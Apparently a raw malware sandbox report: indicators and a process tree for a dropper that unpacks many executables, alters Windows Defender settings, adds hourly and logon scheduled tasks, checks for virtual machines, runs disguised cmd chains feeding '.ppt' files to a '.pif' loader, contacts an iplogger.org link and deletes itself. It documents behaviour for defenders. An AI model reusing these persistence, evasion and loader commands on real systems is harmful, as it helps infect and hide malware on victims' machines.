3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe
3780	GbuD4i_efESBuRODxYNQDKS8.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

qosyhVzrDNPFTA7hWJVASQ98.exe

pid process

2016 qosyhVzrDNPFTA7hWJVASQ98.exe

pid	process
2016	qosyhVzrDNPFTA7hWJVASQ98.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

1AqPQJBbIZ5GNPPjIY1eYvX4.exe4zjfSqgdDfO75cEazgMM31G2.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4120	1AqPQJBbIZ5GNPPjIY1eYvX4.exe
Token: SeDebugPrivilege	2484	4zjfSqgdDfO75cEazgMM31G2.exe
Token: SeDebugPrivilege	2288	powershell.exe

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe2uXEeqzhu92tsk2yel57BCLr.exedpYfYpV7Y8FistCPU3hIQZVI.exeGETSUD~4.EXE

description	pid	process	target process
PID 2324 wrote to memory of 3780	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	GbuD4i_efESBuRODxYNQDKS8.exe
PID 2324 wrote to memory of 3780	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	GbuD4i_efESBuRODxYNQDKS8.exe
PID 2324 wrote to memory of 4824	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	2uXEeqzhu92tsk2yel57BCLr.exe
PID 2324 wrote to memory of 4824	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	2uXEeqzhu92tsk2yel57BCLr.exe
PID 2324 wrote to memory of 4824	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	2uXEeqzhu92tsk2yel57BCLr.exe
PID 2324 wrote to memory of 4120	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	1AqPQJBbIZ5GNPPjIY1eYvX4.exe
PID 2324 wrote to memory of 4120	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	1AqPQJBbIZ5GNPPjIY1eYvX4.exe
PID 2324 wrote to memory of 4120	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	1AqPQJBbIZ5GNPPjIY1eYvX4.exe
PID 2324 wrote to memory of 428	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	SGAXIbr9pYUeG2DexXN9AgtZ.exe
PID 2324 wrote to memory of 428	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	SGAXIbr9pYUeG2DexXN9AgtZ.exe
PID 2324 wrote to memory of 428	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	SGAXIbr9pYUeG2DexXN9AgtZ.exe
PID 2324 wrote to memory of 4360	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	1wK59ewxmA8n1F3L1XAnYyfI.exe
PID 2324 wrote to memory of 4360	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	1wK59ewxmA8n1F3L1XAnYyfI.exe
PID 2324 wrote to memory of 4360	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	1wK59ewxmA8n1F3L1XAnYyfI.exe
PID 2324 wrote to memory of 2484	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	4zjfSqgdDfO75cEazgMM31G2.exe
PID 2324 wrote to memory of 2484	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	4zjfSqgdDfO75cEazgMM31G2.exe
PID 2324 wrote to memory of 2484	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	4zjfSqgdDfO75cEazgMM31G2.exe
PID 2324 wrote to memory of 2016	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	qosyhVzrDNPFTA7hWJVASQ98.exe
PID 2324 wrote to memory of 2016	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	qosyhVzrDNPFTA7hWJVASQ98.exe
PID 2324 wrote to memory of 2016	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	qosyhVzrDNPFTA7hWJVASQ98.exe
PID 4824 wrote to memory of 4264	4824	2uXEeqzhu92tsk2yel57BCLr.exe	cMrn0hy0JuBiO_TvoDlE4yGY.exe
PID 4824 wrote to memory of 4264	4824	2uXEeqzhu92tsk2yel57BCLr.exe	cMrn0hy0JuBiO_TvoDlE4yGY.exe
PID 4824 wrote to memory of 4264	4824	2uXEeqzhu92tsk2yel57BCLr.exe	cMrn0hy0JuBiO_TvoDlE4yGY.exe
PID 4824 wrote to memory of 4148	4824	2uXEeqzhu92tsk2yel57BCLr.exe	schtasks.exe
PID 2324 wrote to memory of 4984	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	dpYfYpV7Y8FistCPU3hIQZVI.exe
PID 4824 wrote to memory of 4148	4824	2uXEeqzhu92tsk2yel57BCLr.exe	schtasks.exe
PID 4824 wrote to memory of 4148	4824	2uXEeqzhu92tsk2yel57BCLr.exe	schtasks.exe
PID 2324 wrote to memory of 4984	2324	be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe	dpYfYpV7Y8FistCPU3hIQZVI.exe
PID 4824 wrote to memory of 2188	4824	2uXEeqzhu92tsk2yel57BCLr.exe	schtasks.exe
PID 4824 wrote to memory of 2188	4824	2uXEeqzhu92tsk2yel57BCLr.exe	schtasks.exe
PID 4824 wrote to memory of 2188	4824	2uXEeqzhu92tsk2yel57BCLr.exe	schtasks.exe
PID 4984 wrote to memory of 208	4984	dpYfYpV7Y8FistCPU3hIQZVI.exe	GETSUD~4.EXE
PID 4984 wrote to memory of 208	4984	dpYfYpV7Y8FistCPU3hIQZVI.exe	GETSUD~4.EXE
PID 4984 wrote to memory of 208	4984	dpYfYpV7Y8FistCPU3hIQZVI.exe	GETSUD~4.EXE
PID 208 wrote to memory of 2288	208	GETSUD~4.EXE	powershell.exe
PID 208 wrote to memory of 2288	208	GETSUD~4.EXE	powershell.exe
PID 208 wrote to memory of 2288	208	GETSUD~4.EXE	powershell.exe

C:\Users\Admin\AppData\Local\Temp\be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe
"C:\Users\Admin\AppData\Local\Temp\be42e10757aca35e7d0c6b553a856803bcadd5d12ac828197e54c369a0519cd1.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2324
- C:\Users\Admin\Pictures\Adobe Films\GbuD4i_efESBuRODxYNQDKS8.exe
  "C:\Users\Admin\Pictures\Adobe Films\GbuD4i_efESBuRODxYNQDKS8.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3780
- C:\Users\Admin\Pictures\Adobe Films\2uXEeqzhu92tsk2yel57BCLr.exe
  "C:\Users\Admin\Pictures\Adobe Films\2uXEeqzhu92tsk2yel57BCLr.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Users\Admin\Documents\cMrn0hy0JuBiO_TvoDlE4yGY.exe
    "C:\Users\Admin\Documents\cMrn0hy0JuBiO_TvoDlE4yGY.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Executes dropped EXE
    - Checks computer location settings
    PID:4264
  - - C:\Users\Admin\Pictures\Adobe Films\_KFqi3m1AcY5LBEbmANpqiBR.exe
      "C:\Users\Admin\Pictures\Adobe Films\_KFqi3m1AcY5LBEbmANpqiBR.exe"
      4⤵
      PID:2636
  - - C:\Users\Admin\Pictures\Adobe Films\XRHl3RwuaIHwtns7e9p6HbXT.exe
      "C:\Users\Admin\Pictures\Adobe Films\XRHl3RwuaIHwtns7e9p6HbXT.exe"
      4⤵
      PID:28460
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28460 -s 796
        5⤵
        Program crash
        
        PID:4528
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28460 -s 804
        5⤵
        Program crash
        
        PID:2988
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28460 -s 808
        5⤵
        Program crash
        
        PID:37884
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28460 -s 788
        5⤵
        Program crash
        
        PID:37084
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28460 -s 1004
        5⤵
        Program crash
        
        PID:35860
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28460 -s 1040
        5⤵
        Program crash
        
        PID:36952
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28460 -s 1392
        5⤵
        Program crash
        
        PID:16840
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28460 -s 1408
        5⤵
        Program crash
        
        PID:3192
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "XRHl3RwuaIHwtns7e9p6HbXT.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\XRHl3RwuaIHwtns7e9p6HbXT.exe" & exit
        5⤵
        
        PID:4816
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "XRHl3RwuaIHwtns7e9p6HbXT.exe" /f
        6⤵
        Kills process with taskkill
        
        PID:37032
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28460 -s 1420
        5⤵
        Program crash
        
        PID:37356
  - - C:\Users\Admin\Pictures\Adobe Films\xSBG4sLi0TyuV39LugiUGeby.exe
      "C:\Users\Admin\Pictures\Adobe Films\xSBG4sLi0TyuV39LugiUGeby.exe"
      4⤵
      PID:29808
    - - C:\Windows\SysWOW64\dllhost.exe
        
        dllhost kjdlskreshduehfiuwefuihuzhdsfbvnzmnnxcvjkhawiuoyrf8wer847345
        5⤵
        
        PID:33400
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Questo.ppt & ping -n 5 localhost
        5⤵
        
        PID:35540
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        6⤵
        
        PID:36464
        
        C:\Windows\SysWOW64\find.exe
        
        find /I /N "psuaservice.exe"
        7⤵
        
        PID:1472
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FI "imagename eq PSUAService.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:37152
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^EMjNKsUmZgpLIzWkfbdJjdfgUCiantYcrvsDCTscDINycNZcJFvRHNEgvYTipBwUfOIkwaJvyUyDClSuCMJSIiNdSeuDqljwHTQHtOzdWqLNHqLjyMEvRpjowazYkyvVHrWJxlwOz$" Sorrideva.ppt
        7⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Nostra.exe.pif
        
        Nostra.exe.pif f
        7⤵
        
        PID:27552
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 localhost
        6⤵
        Runs ping.exe
        
        PID:37056
  - - C:\Users\Admin\Pictures\Adobe Films\cF4vOAVrBYBdTcGKrlHu2Rj5.exe
      "C:\Users\Admin\Pictures\Adobe Films\cF4vOAVrBYBdTcGKrlHu2Rj5.exe"
      4⤵
      PID:30992
    - - C:\Users\Admin\AppData\Local\Temp\7zS7A21.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:2004
  - - C:\Users\Admin\Pictures\Adobe Films\3AGrXboVqrGmRh1tWjtXPtGP.exe
      "C:\Users\Admin\Pictures\Adobe Films\3AGrXboVqrGmRh1tWjtXPtGP.exe"
      4⤵
      PID:32400
    - - C:\Users\Admin\Pictures\Adobe Films\3AGrXboVqrGmRh1tWjtXPtGP.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3AGrXboVqrGmRh1tWjtXPtGP.exe" help
        5⤵
        
        PID:36852
  - - C:\Users\Admin\Pictures\Adobe Films\PrGJ8E8K3NvYVRmqf8UJEvqi.exe
      "C:\Users\Admin\Pictures\Adobe Films\PrGJ8E8K3NvYVRmqf8UJEvqi.exe"
      4⤵
      PID:31564
  - - C:\Users\Admin\Pictures\Adobe Films\t5HcB7GVPEMlmuXDbChwYp4X.exe
      "C:\Users\Admin\Pictures\Adobe Films\t5HcB7GVPEMlmuXDbChwYp4X.exe"
      4⤵
      PID:4380
    - - C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
        5⤵
        
        PID:11324
      - C:\Users\Admin\AppData\Local\Temp\H83J5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H83J5.exe"
        6⤵
        
        PID:1144
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\H83J5.exe"
        7⤵
        
        PID:37696
      - C:\Users\Admin\AppData\Local\Temp\L43J8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L43J8.exe"
        6⤵
        
        PID:35292
      - C:\Users\Admin\AppData\Local\Temp\L43J8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L43J8.exe"
        6⤵
        
        PID:12320
      - C:\Users\Admin\AppData\Local\Temp\J79BB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\J79BB.exe"
        6⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /y .\BRXlVN.Zd
        7⤵
        
        PID:37636
      - C:\Users\Admin\AppData\Local\Temp\J79BBB4J6239I8H.exe
        
        https://iplogger.org/1OAvJ
        6⤵
        
        PID:1348
    - - C:\Users\Admin\AppData\Local\Temp\liyong.exe
        
        "C:\Users\Admin\AppData\Local\Temp\liyong.exe"
        5⤵
        
        PID:32176
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 1556
        5⤵
        Program crash
        
        PID:37204
  - - C:\Users\Admin\Pictures\Adobe Films\zfj0OGHSUyq8EvQM9DSsLcEN.exe
      "C:\Users\Admin\Pictures\Adobe Films\zfj0OGHSUyq8EvQM9DSsLcEN.exe"
      4⤵
      PID:36836
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4148
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:2188
- C:\Users\Admin\Pictures\Adobe Films\1AqPQJBbIZ5GNPPjIY1eYvX4.exe
  "C:\Users\Admin\Pictures\Adobe Films\1AqPQJBbIZ5GNPPjIY1eYvX4.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4120
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 1176
    3⤵
    - Program crash
    PID:4820
- C:\Users\Admin\Pictures\Adobe Films\SGAXIbr9pYUeG2DexXN9AgtZ.exe
  "C:\Users\Admin\Pictures\Adobe Films\SGAXIbr9pYUeG2DexXN9AgtZ.exe"
  2⤵
  - Executes dropped EXE
  PID:428
- C:\Users\Admin\Pictures\Adobe Films\1wK59ewxmA8n1F3L1XAnYyfI.exe
  "C:\Users\Admin\Pictures\Adobe Films\1wK59ewxmA8n1F3L1XAnYyfI.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4360
- - C:\Users\Admin\Pictures\Adobe Films\1wK59ewxmA8n1F3L1XAnYyfI.exe
    "C:\Users\Admin\Pictures\Adobe Films\1wK59ewxmA8n1F3L1XAnYyfI.exe"
    3⤵
    PID:772
- C:\Users\Admin\Pictures\Adobe Films\4zjfSqgdDfO75cEazgMM31G2.exe
  "C:\Users\Admin\Pictures\Adobe Films\4zjfSqgdDfO75cEazgMM31G2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2484
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 1148
    3⤵
    - Program crash
    PID:2688
- C:\Users\Admin\Pictures\Adobe Films\qosyhVzrDNPFTA7hWJVASQ98.exe
  "C:\Users\Admin\Pictures\Adobe Films\qosyhVzrDNPFTA7hWJVASQ98.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2016
- C:\Users\Admin\Pictures\Adobe Films\dpYfYpV7Y8FistCPU3hIQZVI.exe
  "C:\Users\Admin\Pictures\Adobe Films\dpYfYpV7Y8FistCPU3hIQZVI.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4984
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GETSUD~4.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GETSUD~4.EXE
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:208
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Start-Sleep -Seconds 9;Start-Sleep -Seconds 9;
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2288
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout 45
      4⤵
      PID:2364
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 45
        5⤵
        Delays execution with timeout.exe
        
        PID:37156
- C:\Users\Admin\Pictures\Adobe Films\Xv5FAWTRkWDqYJU03EnKACAw.exe
  "C:\Users\Admin\Pictures\Adobe Films\Xv5FAWTRkWDqYJU03EnKACAw.exe"
  2⤵
  PID:4600
- - C:\Users\Admin\AppData\Local\Temp\is-D2FQM.tmp\Xv5FAWTRkWDqYJU03EnKACAw.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-D2FQM.tmp\Xv5FAWTRkWDqYJU03EnKACAw.tmp" /SL5="$901CE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Xv5FAWTRkWDqYJU03EnKACAw.exe"
    3⤵
    PID:4076
  - - C:\Users\Admin\AppData\Local\Temp\is-OTG5M.tmp\befeduce.exe
      "C:\Users\Admin\AppData\Local\Temp\is-OTG5M.tmp\befeduce.exe" /S /UID=Irecch4
      4⤵
      PID:4588
    - - C:\Users\Admin\AppData\Local\Temp\56-66c71-884-7fdbf-04e79ef4c4ebb\Sobyheraepo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\56-66c71-884-7fdbf-04e79ef4c4ebb\Sobyheraepo.exe"
        5⤵
        
        PID:28280
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1472
        6⤵
        
        PID:33284
    - - C:\Users\Admin\AppData\Local\Temp\ee-ebb33-767-6eb8b-7ee5a019a196e\Hazhacyqeny.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ee-ebb33-767-6eb8b-7ee5a019a196e\Hazhacyqeny.exe"
        5⤵
        
        PID:31004
    - - C:\Program Files\Microsoft Office\NROAXESBQF\irecord.exe
        
        "C:\Program Files\Microsoft Office\NROAXESBQF\irecord.exe" /VERYSILENT
        5⤵
        
        PID:2672
      - C:\Users\Admin\AppData\Local\Temp\is-LM63E.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LM63E.tmp\irecord.tmp" /SL5="$801CC,5808768,66560,C:\Program Files\Microsoft Office\NROAXESBQF\irecord.exe" /VERYSILENT
        6⤵
        
        PID:35876
        
        C:\Program Files (x86)\i-record\I-Record.exe
        
        "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
        7⤵
        
        PID:4444
- C:\Users\Admin\Pictures\Adobe Films\aMBcoZlKoqJ7OLfIrh6_QoIy.exe
  "C:\Users\Admin\Pictures\Adobe Films\aMBcoZlKoqJ7OLfIrh6_QoIy.exe"
  2⤵
  PID:2740
- - C:\Users\Admin\Pictures\Adobe Films\aMBcoZlKoqJ7OLfIrh6_QoIy.exe
    "C:\Users\Admin\Pictures\Adobe Films\aMBcoZlKoqJ7OLfIrh6_QoIy.exe"
    3⤵
    PID:8760
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\72a2a1f1-0482-456c-9518-793d570294f9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:35868
  - - C:\Users\Admin\Pictures\Adobe Films\aMBcoZlKoqJ7OLfIrh6_QoIy.exe
      "C:\Users\Admin\Pictures\Adobe Films\aMBcoZlKoqJ7OLfIrh6_QoIy.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:37676
    - - C:\Users\Admin\Pictures\Adobe Films\aMBcoZlKoqJ7OLfIrh6_QoIy.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\aMBcoZlKoqJ7OLfIrh6_QoIy.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:1124
      - C:\Users\Admin\AppData\Local\7676cfcf-5636-44b0-bddc-4ed654a5ad14\build2.exe
        
        "C:\Users\Admin\AppData\Local\7676cfcf-5636-44b0-bddc-4ed654a5ad14\build2.exe"
        6⤵
        
        PID:1816
        
        C:\Users\Admin\AppData\Local\7676cfcf-5636-44b0-bddc-4ed654a5ad14\build2.exe
        
        "C:\Users\Admin\AppData\Local\7676cfcf-5636-44b0-bddc-4ed654a5ad14\build2.exe"
        7⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1508 -s 1680
        8⤵
        Program crash
        
        PID:1680
- C:\Users\Admin\Pictures\Adobe Films\caFsmqoGstTrDkGvrHddC4qx.exe
  "C:\Users\Admin\Pictures\Adobe Films\caFsmqoGstTrDkGvrHddC4qx.exe"
  2⤵
  PID:1216
- - C:\Windows\SysWOW64\dllhost.exe
    dllhost kjdlskreshduehfiuwefuihuzhdsfbvnzmnnxcvjkhawiuoyrf8wer847345
    3⤵
    PID:464
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c cmd < Questo.ppt & ping -n 5 localhost
    3⤵
    PID:7740
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:27016
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FI "imagename eq PSUAService.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:36908
    - - C:\Windows\SysWOW64\find.exe
        
        find /I /N "psuaservice.exe"
        5⤵
        
        PID:31572
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^EMjNKsUmZgpLIzWkfbdJjdfgUCiantYcrvsDCTscDINycNZcJFvRHNEgvYTipBwUfOIkwaJvyUyDClSuCMJSIiNdSeuDqljwHTQHtOzdWqLNHqLjyMEvRpjowazYkyvVHrWJxlwOz$" Sorrideva.ppt
        5⤵
        
        PID:37440
    - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Nostra.exe.pif
        
        Nostra.exe.pif f
        5⤵
        
        PID:2596
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 5 localhost
      4⤵
      Runs ping.exe
      PID:1640
- C:\Users\Admin\Pictures\Adobe Films\cUEBuzu6C11AR30L1vnbB9IO.exe
  "C:\Users\Admin\Pictures\Adobe Films\cUEBuzu6C11AR30L1vnbB9IO.exe"
  2⤵
  PID:3364
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 456
    3⤵
    - Program crash
    PID:14124
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 776
    3⤵
    - Program crash
    PID:26508
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 808
    3⤵
    - Program crash
    PID:35528
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 828
    3⤵
    - Program crash
    PID:4588
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 1004
    3⤵
    - Program crash
    PID:37632
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 1040
    3⤵
    - Program crash
    PID:37016
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 1072
    3⤵
    - Program crash
    PID:3676
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "cUEBuzu6C11AR30L1vnbB9IO.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\cUEBuzu6C11AR30L1vnbB9IO.exe" & exit
    3⤵
    - Blocklisted process makes network request
    PID:4120
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "cUEBuzu6C11AR30L1vnbB9IO.exe" /f
      4⤵
      Kills process with taskkill
      PID:37656
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 712
    3⤵
    - Program crash
    PID:4128
- C:\Users\Admin\Pictures\Adobe Films\3cjfmU9Ge1H2eeLel63Xu4Z5.exe
  "C:\Users\Admin\Pictures\Adobe Films\3cjfmU9Ge1H2eeLel63Xu4Z5.exe"
  2⤵
  PID:3632
- C:\Users\Admin\Pictures\Adobe Films\dp134894S7w_DVNgzZ6IGBky.exe
  "C:\Users\Admin\Pictures\Adobe Films\dp134894S7w_DVNgzZ6IGBky.exe"
  2⤵
  PID:2476
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:15568
- C:\Users\Admin\Pictures\Adobe Films\9f8FHBpALgQmB6N43HpfHThL.exe
  "C:\Users\Admin\Pictures\Adobe Films\9f8FHBpALgQmB6N43HpfHThL.exe"
  2⤵
  PID:1960
- C:\Users\Admin\Pictures\Adobe Films\_YtOwTx5ltFoIEyhp6QRoJoy.exe
  "C:\Users\Admin\Pictures\Adobe Films\_YtOwTx5ltFoIEyhp6QRoJoy.exe"
  2⤵
  PID:3472
- C:\Users\Admin\Pictures\Adobe Films\ud6yEaQ6sKfiQJb3OY7zllf7.exe
  "C:\Users\Admin\Pictures\Adobe Films\ud6yEaQ6sKfiQJb3OY7zllf7.exe"
  2⤵
  PID:2060
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 1740
    3⤵
    - Program crash
    PID:36904
- C:\Users\Admin\Pictures\Adobe Films\orp110tpzRWiCv5zfQ5Im6sw.exe
  "C:\Users\Admin\Pictures\Adobe Films\orp110tpzRWiCv5zfQ5Im6sw.exe"
  2⤵
  PID:1128
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1128 -s 1640
    3⤵
    - Program crash
    PID:19180
- C:\Users\Admin\Pictures\Adobe Films\4QVhMJNH0MjdkKca4vj43sT_.exe
  "C:\Users\Admin\Pictures\Adobe Films\4QVhMJNH0MjdkKca4vj43sT_.exe"
  2⤵
  PID:1200
- - C:\Users\Admin\Pictures\Adobe Films\4QVhMJNH0MjdkKca4vj43sT_.exe
    "C:\Users\Admin\Pictures\Adobe Films\4QVhMJNH0MjdkKca4vj43sT_.exe"
    3⤵
    PID:37468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4120 -ip 4120
1⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2484 -ip 2484
1⤵
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3364 -ip 3364
1⤵
PID:8748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 3364 -ip 3364
1⤵
PID:23292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3364 -ip 3364
1⤵
PID:34504

C:\Windows\SysWOW64\WerFault.exe
